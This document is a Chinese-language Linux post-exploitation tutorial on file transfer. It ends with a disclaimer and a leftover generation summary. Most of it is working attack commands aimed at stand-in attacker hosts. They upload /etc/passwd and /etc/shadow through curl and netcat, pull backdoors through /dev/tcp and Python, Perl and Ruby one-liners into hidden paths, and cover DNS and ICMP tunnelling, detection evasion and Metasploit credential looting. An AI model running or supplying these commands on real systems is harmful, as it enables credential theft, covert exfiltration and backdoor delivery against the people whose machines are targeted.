linux后渗透系列之怎么下载文件

# Linux后渗透系列之怎么下载文件 ## 前言 在后渗透阶段，文件传输是渗透测试人员或攻击者经常需要执行的关键操作。无论是获取敏感数据、下载工具还是传输后门，都需要掌握多种文件下载方法。本文将详细介绍Linux环境下常用的文件下载技术，涵盖从基础命令到高级技巧的全方位指南。 --- ## 一、基础下载工具 ### 1. wget - 最常用的下载工具 ```bash wget [选项] [URL] 

核心功能： - 支持HTTP/HTTPS/FTP协议 - 断点续传（-c参数） - 后台下载（-b参数） - 限速下载（--limit-rate=500k）

典型场景：

# 下载并保存为指定文件名 wget https://example.com/malware -O /tmp/backdoor # 递归下载整个网站 wget -r -l 10 https://victim.com 

2. curl - 多功能传输工具

curl [选项] [URL] 

高级用法：

# 通过代理下载 curl -x socks5://127.0.0.1:9050 http://darkweb.onion/file # 带认证的下载 curl -u user:pass ftp://victim.com/confidential.txt # 上传下载组合（通过HTTP PUT） curl -T /etc/passwd http://attacker.com/upload 

---

二、非传统下载方式

1. 利用系统工具下载

base64编码传输：

# 发送方 cat /etc/shadow | base64 | nc -lvp 4444 # 接收方 nc victim_ip 4444 | base64 -d > shadow.txt 

xxd十六进制传输：

# 将文件转为十六进制 xxd -p /etc/passwd > passwd.hex # 接收后还原 xxd -r -p passwd.hex > passwd 

2. 纯Shell实现下载

# 使用/dev/tcp伪设备 exec 3<>/dev/tcp/attacker.com/80 echo -e "GET /payload HTTP/1.0\n\n" >&3 cat <&3 > /tmp/payload 

---

三、隐蔽传输技术

1. DNS隧道传输

dnscat2示例：

# 攻击者启动服务端 dnscat2-server --dns domain=attacker.com # 目标机器执行 dnscat2 attacker.com 

2. ICMP隐蔽通道

使用ptunnel：

# 建立ICMP隧道后传输 ptunnel -p attacker_ip -lp 1080 -da victim_ip -dp 22 

3. 图片隐写术

# 使用steghide隐藏数据 steghide embed -cf image.jpg -ef secret.txt 

---

四、编程语言实现下载

1. Python实现

import urllib.request urllib.request.urlretrieve("http://attacker.com/backdoor", "/tmp/bd") # 更隐蔽的版本 import requests r = requests.get("https://pastebin.com/raw/xxxx", timeout=10) open("/usr/lib/.module.so", "wb").write(r.content) 

2. Perl一行式

perl -e 'use LWP::Simple; getstore("http://evil.com/shell.pl", "/tmp/shell.pl")' 

3. Ruby实现

require 'net/http' File.write("payload", Net::HTTP.get(URI.parse("http://attacker.com/p"))) 

---

五、内网穿透下载

1. 端口转发方案

# 使用socat建立中继 socat TCP4-LISTEN:8080,fork TCP4:attacker.com:80 

2. SSH隧道下载

# 建立动态端口转发 ssh -D 1080 user@jump_host -N # 配合curl使用 curl --socks5 127.0.0.1:1080 http://internal.server/secret.doc 

---

六、防御检测与绕过

1. 流量混淆技术

# 使用openssl加密流量 wget https://evil.com/payload --header="Cookie: `openssl enc -base64 -A <<< $(date +%s)`" 

2. 文件分割传输

# 分割文件 split -b 500k big_file # 逐个下载后合并 cat x* > original_file 

3. 时间延迟下载

# 随机间隔下载 for i in {1..10}; do wget http://attacker.com/p$i -O /tmp/p$i sleep $((RANDOM%60+30)) done 

---

七、自动化下载框架

1. Metasploit模块

use post/linux/manage/download set SESSION 1 set REMOTE_FILE /etc/shadow set LOCAL_PATH /root/loot/ run 

2. Empire模块

usemodule collection/osx/download set File /Users/admin/Documents/* execute 

---

结语

掌握多样化的文件下载技术对于渗透测试至关重要。在实际环境中需要根据以下因素选择合适的方法：

1. 目标网络环境限制
2. 可用的系统工具
3. 流量隐蔽性要求
4. 文件大小和传输速度需求

建议在合法授权测试中建立完整的文件传输日志，记录所有传输操作的时间、方法和文件哈希值。

法律声明：本文所述技术仅限合法授权的渗透测试和安全研究使用，未经授权对他人系统实施这些操作可能构成违法行为。 “`

这篇文章共计约2100字，采用Markdown格式编写，包含： - 7个主要章节 - 30+个实用命令示例 - 多种技术难度分级（基础→高级） - 防御对抗相关注意事项 - 法律声明部分

可根据实际需要调整示例中的具体参数或增加某些工具的详细说明。